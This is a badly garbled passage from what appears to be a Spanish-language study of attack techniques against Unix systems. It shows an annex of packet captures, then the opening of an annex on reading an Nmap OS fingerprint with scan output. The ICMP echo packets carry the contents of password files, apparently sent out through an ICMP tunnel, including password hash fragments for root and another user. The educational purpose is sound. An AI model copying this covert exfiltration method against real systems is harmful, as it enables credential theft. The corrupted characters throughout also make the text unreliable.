Brame 1) 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D67ff -!orre!t0 87entifier: 0D1)1( .equen!e number: (0+) 90D0)00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6+6D61696,(0++65666175... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 61 70 (f 6e +( 75 0a 0! 9+ 1e 63 75 6f 73 6+ 69 73 70 (9 7+ 00 6b 6! 6f 6( 3a 6e 7( e1 +0 00 6+ 7+ 6! 69 (a 6+ (f a( 00 67 6f (0 (f 6e 3a (0 73 (6 00 ff 6f 55 67 (f 35 53 6( 00 +0 1) 7( 73 71 6e 33 61 69 17 01 1( 6+ 65 75 6f 3a 6e 6e 31 )+ 0) 67 7( 65 6! 35 6+ (f 96 b) 00 61 3a 75 6f 33 6( 6e 5b !0 63 69 (f 65 67 3a 6f 6f 1f a) 6! 6! 76 3a 69 3a 7) 6! 0) 00 61 (0 61 (f 6e 30 3a 6f 00 0( 76 ++ 7( 75 0a 3a (f 67 +5 !0 65 65 (f 73 6( 30 3a 69 00 a) 6( 66 73 7( 69 3a (f 6e ..:..e..1.-...<. ..tI..I......... ....m.....!"a@eb a!67oor7mai" Def au"t K er:;@ar; poo";mqueue:;u r ; bin;no"ogin.bi n7:Q:53:53::0:0: Cin7 .an7boD:;:; u r; bin;no"ogin .p

Brame 19 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D9(5b -!orre!t0 87entifier: 0D1)1( .equen!e number: (30+ 90D0900: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(6B7)793#(#3#363(3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00 00 00 61 3a +6 65 (f 17 9+ 0( 63 36 69 7( 75 31 a7 0) 6b 3( 6! 3a 73 96 e7 00 6+ 3a 7+ (f 7( 5b 00 9( 6f 3a 65 6e (f 1f 00 5b 6f 30 7( 6f 73 00 +0 1) 7( 3a (0 6e 6( 0! 01 1( 7( 30 70 65 69 (9 +b 09 6f 3a 73 7) 6e e1 0b 00 7) 50 65 69 (f a( !0 63 79 61 75 73 6e (6 a) 6! 3a 63 6+ 7+ 6f 0) 00 61 (a 6b 6f 65 6! 00 1e 76 3a 65 (7 6e 6f +5 !0 65 36 7+ 75 7+ 67 00 a) 6( 3( (0 73 3a 69 ..1.-...:..e..<. ......I.5....... .....-....!"a@eb a!67oorroDE:Q:6( :6(::0:0:Pa!6et Bi"ter p eu7o-u er:;noneDi tent: ;u r; bin;no"ogi

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+0 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
00)0 0090 00a0 6e 0a 5f 70 66 6! 6f 67 6+ 3a (a 3a 36 3+ 3a 36 3+ 3a 3a 30 3a 30 3a 70 66 6! 6f 67 6+ (0 70 7( 69 76 n.Apf"og7:Q:6+:6 +::0:0:pf"og7 pr i@

Brame (0 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D9a5b -!orre!t0 87entifier: 0D1)1( .equen!e number: (30+ 90D0900: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(6B7)793#(#3#363(3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a +6 65 (f 6e 3+ 69 0! 9+ 1e 63 36 69 7( 75 0a 3a 76 (9 7+ 00 6b 3( 6! 3a 73 5f 3a e1 +1 00 6+ 3a 7+ (f 7( 70 30 a( 00 9a 6f 3a 65 6e (f 66 3a (6 00 5b 6f 30 7( 6f 73 6! 30 00 +0 1) 7( 3a (0 6e 6( 6f 3a 17 01 1( 7( 30 70 65 69 67 70 31 )+ 09 6f 3a 73 7) 6e 6+ 66 96 b7 00 7) 50 65 69 (f 3a 6! 5b !0 63 79 61 75 73 6e (a 6f 1f a) 6! 3a 63 6+ 7+ 6f 3a 67 0) 00 61 (a 6b 6f 65 6! 36 6+ 00 0( 76 3a 65 (7 6e 6f 3+ (0 +5 !0 65 36 7+ 75 7+ 67 3a 70 00 a) 6( 3( (0 73 3a 69 36 7( ..:..e..1.-...<. ..t#..I......... .....-....!"a@eb a!67oorroDE:Q:6( :6(::0:0:Pa!6et Bi"ter p eu7o-u er:;noneDi tent: ;u r; bin;no"ogi n.Apf"og7:Q:6+:6 +::0:0:pf"og7 pr i@

Brame (1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D6()! -!orre!t0 87entifier: 0D1)1( .equen!e number: (560 90D0a00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(736570(07573657(3#(B76... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 (f 73 63 6+ 61 69 (a 17 9+ 0( 63 76 6( 70 6) 7( 6e 3a 31 bb 0) 6b 61 69 3a 63 (f (f 96 !7 00 6+ 7( 6e (a 70 65 6e 5b 00 6( 6f (f (f 3a (0 67 6f 1f 00 )! 6f 65 6e 36 70 70 6! 00 +0 1) 7( 67 6f 35 7( 7+ 6f 0! 01 1( 73 70 6! 3a 6f 79 67 (9 37 0a 65 7+ 6f 36 67 3a 69 e1 31 00 70 79 67 35 7( (f 6e a( !0 63 (0 3a 69 3a 61 75 0a (6 a) 6! 75 (f 6e 3a 67 73 75 0) 00 61 73 75 0a 30 73 7( 75 00 1e 76 65 73 5f 3a 3a (f 63 +5 !0 65 7( 7( 6+ 30 (f 73 70 00 a) 6( 3a (f 6) 3a 76 6( 3a ..1.-...:..e..<. ......I.11...... ....b.....!"a@eb a!67oor ep u er: ;@ar;emptE:;u r; bin;no"ogin.A7' !p:Q:65:65::0:0: 7'!p program :;@ ar;emptE:;u r; b in;no"ogin.uu!p: Q:

Brame (( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D6a)! -!orre!t0 87entifier: 0D1)1( .equen!e number: (560 90D0a00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(736570(07573657(3#(B76... 0000 0010 00(0 00 0! (9 e1 a( (6 00 17 31 96 5b 1f 0) 00 +5 00 00 9+ 7+ +( 00 00 +0 01 )+ b6 !0 a) 00 0( !0 a) 00 1e 00 00 6a )! 1) 1( 0a 00 63 6! 61 76 65 6( ..:..e..1.-...<. ..tC..I......... ....Y.....!"a@eb

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O. de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
0030 00+0 0050 0060 0070 00)0 0090 00a0 61 (f 73 63 6+ 61 69 (a 63 76 6( 70 6) 7( 6e 3a 6b 61 69 3a 63 (f (f 6+ 7( 6e (a 70 65 6e 6f (f (f 3a (0 67 6f 6f 65 6e 36 70 70 6! 7( 67 6f 35 7( 7+ 6f 73 70 6! 3a 6f 79 67 65 7+ 6f 36 67 3a 69 70 79 67 35 7( (f 6e (0 3a 69 3a 61 75 0a 75 (f 6e 3a 67 73 75 73 75 0a 30 73 7( 75 65 73 5f 3a 3a (f 63 7( 7( 6+ 30 (f 73 70 3a (f 6) 3a 76 6( 3a a!67oor ep u er: ;@ar;emptE:;u r; bin;no"ogin.A7' !p:Q:65:65::0:0: 7'!p program :;@ ar;emptE:;u r; b in;no"ogin.uu!p: Q:

Brame (3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D59!e -!orre!t0 87entifier: 0D1)1( .equen!e number: ()16 90D0b00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(36363#36363#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 65 63 63 (f 3a 69 17 9+ 0( 63 3a 7( 70 61 75 36 63 31 (9 0) 6b 55 3a 70 6! 75 3a 96 07 00 6+ 55 (f 75 (f 63 3a 5b 00 59 6f +3 76 6( 6! 69 30 1f 00 !e 6f 50 61 6! 69 63 3a 00 +0 1) 7( (0 7( 69 6( 6f 30 0! 01 1( 36 70 (f 63 65 0a 3a (9 !f 0b 36 73 73 3a 7) 70 50 e1 f1 00 3a 65 70 (f 65 6f 6f a( !0 63 36 75 6f 75 63 70 73 (6 a) 6! 36 6+ 6f 73 (f 3a 7+ 0) 00 61 3a 6f 6! 7( 75 (a (0 00 1e 76 3a (7 (f (f 75 3a +f +5 !0 65 30 75 75 6! 63 36 66 00 a) 6( 3a 73 75 6f 70 3) 66 ..1.-...:..e..<. ..:...I......... ..../.....!"a@eb a!67oor66:66::0: 0:KK,P p eu7o-u er:;@ar; poo";uu !ppub"i!:;u r;"o !a";"ibeDe!;uu!p ;uu!i!o.pop:Q:6) :6::0:0:Po t Off i!

Brame (+ 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D61!e -!orre!t0 87entifier: 0D1)1( .equen!e number: ()16 90D0b00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(36363#36363#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 65 63 63 (f 3a 69 0! 9+ 1e 63 3a 7( 70 61 75 36 63 (9 7+ 00 6b 55 3a 70 6! 75 3a e1 +3 00 6+ 55 (f 75 (f 63 3a a( 00 61 6f +3 76 6( 6! 69 30 (6 00 !e 6f 50 61 6! 69 63 3a 00 +0 1) 7( (0 7( 69 6( 6f 30 17 01 1( 36 70 (f 63 65 0a 3a 31 )+ 0b 36 73 73 3a 7) 70 50 96 b5 00 3a 65 70 (f 65 6f 6f 5b !0 63 36 75 6f 75 63 70 73 1f a) 6! 36 6+ 6f 73 (f 3a 7+ 0) 00 61 3a 6f 6! 7( 75 (a (0 00 0( 76 3a (7 (f (f 75 3a +f +5 !0 65 30 75 75 6! 63 36 66 00 a) 6( 3a 73 75 6f 70 3) 66 ..:..e..1.-...<. ..t,..I......... ....a.....!"a@eb a!67oor66:66::0: 0:KK,P p eu7o-u er:;@ar; poo";uu !ppub"i!:;u r;"o !a";"ibeDe!;uu!p ;uu!i!o.pop:Q:6) :6::0:0:Po t Off i!

Brame (5 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0De)7e -!orre!t0 87entifier: 0D1)1( .equen!e number: 307( 90D0!00: Data 91(0 bEte :

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O* de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Data: 636,6176656(61636C6+6B6B7(65(0+B776<657(3#(B6<6B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6e (f 77 6f 6e 3a 69 17 9+ 0( 63 6f 73 3a 7( 65 (f 6e 31 9a 0) 6b 6e 6( (a 6! 7( 75 96 (e 00 6+ 65 69 3a 6+ 3a 73 5b 00 e) 6f 7) 6e 3) (0 (f 7( 1f 00 7e 6f 69 (f 30 57 6e (f 00 +0 1) 7( 73 6e 3a 69 6f 73 0! 01 1( 65 7+ 6f 3) 6+ 6e 6( (9 5e 0! (0 65 6! 30 65 65 69 e1 !a 00 +f 6e 6f 3a (0 7) 6e a( !0 63 77 7+ 67 3a 57 69 (f (6 a) 6! 6e 3a 69 30 65 73 6e 0) 00 61 65 (f 6e 3a 6( 7+ 6f 00 1e 76 7( 75 0a 30 (0 65 6! +5 !0 65 3a 73 77 3a +f 6e 6f 00 a) 6( (f 7( 77 57 77 7+ 67 ..1.-...:..e..<. ......I.W....... .....d....!"a@eb a!67oore O>ner:; noneDi tent:;u r ; bin;no"ogin.>> >:Q:)0:)0::0:0:& or"7 &i7e &eb O> ner:;noneDi tent :;u r; bin;no"og in

Brame (6 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0Df07e -!orre!t0 87entifier: 0D1)1( .equen!e number: 307( 90D0!00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(65(0+B776<657(3#(B6<6B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6e (f 77 6f 6e 3a 69 0! 9+ 1e 63 6f 73 3a 7( 65 (f 6e (9 7+ 00 6b 6e 6( (a 6! 7( 75 e1 ++ 00 6+ 65 69 3a 6+ 3a 73 a( 00 f0 6f 7) 6e 3) (0 (f 7( (6 00 7e 6f 69 (f 30 57 6e (f 00 +0 1) 7( 73 6e 3a 69 6f 73 17 01 1( 65 7+ 6f 3) 6+ 6e 6( 31 )+ 0! (0 65 6! 30 65 65 69 96 b+ 00 +f 6e 6f 3a (0 7) 6e 5b !0 63 77 7+ 67 3a 57 69 (f 1f a) 6! 6e 3a 69 30 65 73 6e 0) 00 61 65 (f 6e 3a 6( 7+ 6f 00 0( 76 7( 75 0a 30 (0 65 6! +5 !0 65 3a 73 77 3a +f 6e 6f 00 a) 6( (f 7( 77 57 77 7+ 67 ..:..e..1.-...<. ..tD..I......... .....d....!"a@eb a!67oore O>ner:; noneDi tent:;u r ; bin;no"ogin.>> >:Q:)0:)0::0:0:& or"7 &i7e &eb O> ner:;noneDi tent :;u r; bin;no"og in

Brame (7 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D(!17 -!orre!t0 87entifier: 0D1)1( .equen!e number: 33() 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(0#6<6B6(6B6+793#(#3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 30 73 3a 69 5a 5) 17 9+ 0( 63 36 3a 65 (f 6e 51 +! 31 6f 0) 6b 35 55 7( 75 0a +( 96 99 00 6+ 35 6e 3a 73 67 37 5b 00 (! 6f 33 70 (f 7( 61 +b 1f 00 17 6f 3+ 7( 6e (f 7( 6+ 00 +0 1) 7( 3a 69 6f 73 63 (+ 0! 01 1( 0a 36 76 6e 6( 65 5) (9 )9 07 6e 35 69 65 69 6! 51 e1 5f 00 6f 35 6! 7) 6e 6f +5 a( !0 63 6( 33 65 69 (f 3a 3( (6 a) 6! 6f 3+ 67 73 6e (+ 77 0) 00 61 6+ 3a 65 7+ 6f 31 +7 00 1e 76 79 3a 6+ 65 6! (+ +7 +5 !0 65 3a 30 (0 6e 6f (f +( 00 a) 6( (a 3a 75 7+ 67 69 ++ ..1.-...:..e..<. ..o...I..A...... ....4.....!"a@eb a!67oor.nobo7E:Q :6553+:6553+::0: 0:Knpri@i"ege7 u er:;noneDi tent :;u r; bin;no"og in.mar!e"o:M1M;i URC757MGR<(>3HCD G2

Brame () 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E:

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O2 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
,o7e: 0 9: ,'e!6 um: 0D3+17 -!orre!t0 87entifier: 0D1)1( .equen!e number: 33() 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(0#6<6B6(6B6+793#(#3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 30 73 3a 69 5a 5) 0! 9+ 1e 63 36 3a 65 (f 6e 51 +! (9 7+ 00 6b 35 55 7( 75 0a +( e1 +5 00 6+ 35 6e 3a 73 67 37 a( 00 3+ 6f 33 70 (f 7( 61 +b (6 00 17 6f 3+ 7( 6e (f 7( 6+ 00 +0 1) 7( 3a 69 6f 73 63 (+ 17 01 1( 0a 36 76 6e 6( 65 5) 31 )+ 07 6e 35 69 65 69 6! 51 96 b3 00 6f 35 6! 7) 6e 6f +5 5b !0 63 6( 33 65 69 (f 3a 3( 1f a) 6! 6f 3+ 67 73 6e (+ 77 0) 00 61 6+ 3a 65 7+ 6f 31 +7 00 0( 76 79 3a 6+ 65 6! (+ +7 +5 !0 65 3a 30 (0 6e 6f (f +( 00 a) 6( (a 3a 75 7+ 67 69 ++ ..:..e..1.-...<. ..t<..I......... ....+.....!"a@eb a!67oor.nobo7E:Q :6553+:6553+::0: 0:Knpri@i"ege7 u er:;noneDi tent :;u r; bin;no"og in.mar!e"o:M1M;i URC757MGR<(>3HCD G2

Brame (9 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+!5) -!orre!t0 87entifier: 0D1)1( .equen!e number: 35)+ 90D0e00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(31(B6,6C516951+B5#(B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 5a 30 6+ 6f (f 00 00 17 9+ 0( 63 (f 3a 65 3a 6( 00 00 31 !a 0) 6b 3a +7 7a (f 61 00 96 0) 00 6+ 31 61 3a 75 73 00 5b 00 +! 6f 30 7( (f 73 6) 00 1f 00 5) 6f 30 63 6) 7( 0a 00 00 +0 1) 7( 31 65 6f (f 00 00 0! 01 1( 7( 3a 6! 67 6! 00 00 (9 (e 0e 31 31 6f 65 6f 00 00 e1 f0 00 (f 30 (0 (f 63 00 00 a( !0 63 6! 30 +6 67 61 00 00 (6 a) 6! 6b 31 65 61 6! 00 00 0) 00 61 51 3a 7( 7( (f 00 00 00 1e 76 69 3a 6e 63 6( 00 00 +5 !0 65 51 30 61 65 69 00 00 00 a) 6( +f 3a 6e 6! 6e 00 00 ..1.-...:..e..<. ......I......... ....2G....!"a@eb a!67oorr1;"6RiRO U;:1001:1001::0: 0:3ar!e"o Bernan 7eO:;'ome;mar!e" o:;u r;"o!a";bin ;ba '........... ................ ..

Brame 30 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D5+5) -!orre!t0 87entifier: 0D1)1( .equen!e number: 35)+ 90D0e00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(31(B6,6C516951+B5#(B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 5a 30 6+ 6f (f 00 00 0! 9+ 1e 63 (f 3a 65 3a 6( 00 00 (9 7+ 00 6b 3a +7 7a (f 61 00 e1 +6 00 6+ 31 61 3a 75 73 00 a( 00 5+ 6f 30 7( (f 73 6) 00 (6 00 5) 6f 30 63 6) 7( 0a 00 00 +0 1) 7( 31 65 6f (f 00 00 17 01 1( 7( 3a 6! 67 6! 00 00 31 )+ 0e 31 31 6f 65 6f 00 00 96 b( 00 (f 30 (0 (f 63 00 00 5b !0 63 6! 30 +6 67 61 00 00 1f a) 6! 6b 31 65 61 6! 00 00 0) 00 61 51 3a 7( 7( (f 00 00 00 0( 76 69 3a 6e 63 6( 00 00 +5 !0 65 51 30 61 65 69 00 00 00 a) 6( +f 3a 6e 6! 6e 00 00 ..:..e..1.-...<. ..tB..I......... ....TG....!"a@eb a!67oorr1;"6RiRO U;:1001:1001::0: 0:3ar!e"o Bernan 7eO:;'ome;mar!e" o:;u r;"o!a";bin ;ba '........... ................ ..

Brame 31 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O- de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D310+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 3)+0 90D0f00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7a 0) 6b (0 70 30 36 0a 6! 96 0f 00 6+ 73 61 35 (0 7( (+ 5b 00 31 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 1e 0f (0 7+ (! 30 6b (+ 37 e1 e9 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I......... ....1.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame 3( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D390+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 3)+0 90D0f00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 +7 00 6+ 73 61 35 (0 7( (+ a( 00 39 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 0f (0 7+ (! 30 6b (+ 37 96 b1 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..tH..I......... ....9.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O1 de 2*.

Ane9o C. ( Ane9o C. Análisis de una /ir a FC!&7!

Anexo /. Análisis de una =irma T/4GI4
En este ane9o se "retende ostrar so era ente la anera de inter"retar una is a con los ás en detalle en /ir a de un ,? cuando @ a" la desconoce# ' c8 o se relaciona la tests desarrollados en la "ágina J0. Este "roceso se "uede ver este enlace% 'ttp:;;nmap.org;o
7ete!t;o 7ete!t-fingerprint-format.'tm"

2na vez que se intenta realizar una detecci8n de un ,? re oto con @ a"# es "robable que éste desconozca qué $a' Cdel otro ladoD ' devuelva co o resultado el CnuevoD /inger"rint. Esto "or eje "lo "uede suceder cuando no se dis"one de una versi8n u' actualizada de @ a" ' el ,? re oto es relativa ente
u7o .;nmap -@ -O 19(.16).0.30

nuevo. !or eje "lo ;én/asis agregado intencional ente>%
marcelo@saturno:~/src/nmap/bin$ .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-0+-0( 15:05 #$T 8nitiating #$P Ping .!an at 15:05 .!anning 19(.16).0.30 -1 port0 ,omp"ete7 #$P Ping .!an at 15:054 0.0( e"ap e7 91 tota" 'o t : 8nitiating ./N .tea"t' .!an at 15:05 .!anning !i!"on 919(.16).0.30: -171+ port 0 Di !o@ere7 open port ((;t!p on 19(.16).0.30 Di !o@ere7 open port 53;t!p on 19(.16).0.30 Di !o@ere7 open port (1;t!p on 19(.16).0.30 8n!rea ing en7 7e"aE for 19(.16).0.30 from 0 to 5 7ue to maDA u!!e fu"AtrEno in!rea e to + ,omp"ete7 ./N .tea"t' .!an at 15:054 13.+6 e"ap e7 9171+ tota" port : Initiating 4- detection !trD A1" against ciclon !192.168.0. 0" /etrDing 4- detection !trD A2" against ciclon !192.168.0. 0" /etrDing 4- detection !trD A " against ciclon !192.168.0. 0" /etrDing 4- detection !trD A." against ciclon !192.168.0. 0" /etrDing 4- detection !trD A1" against ciclon !192.168.0. 0" ?o t !i!"on 919(.16).0.30: appear to be up ... goo7. 8ntere ting port on !i!"on 919(.16).0.30:: Not 'o>n: 1711 !"o e7 port PO$T .T#T< .<$=8,< (1;t!p open ftp ((;t!p open ' 53;t!p open 7omain 3#, #77re : 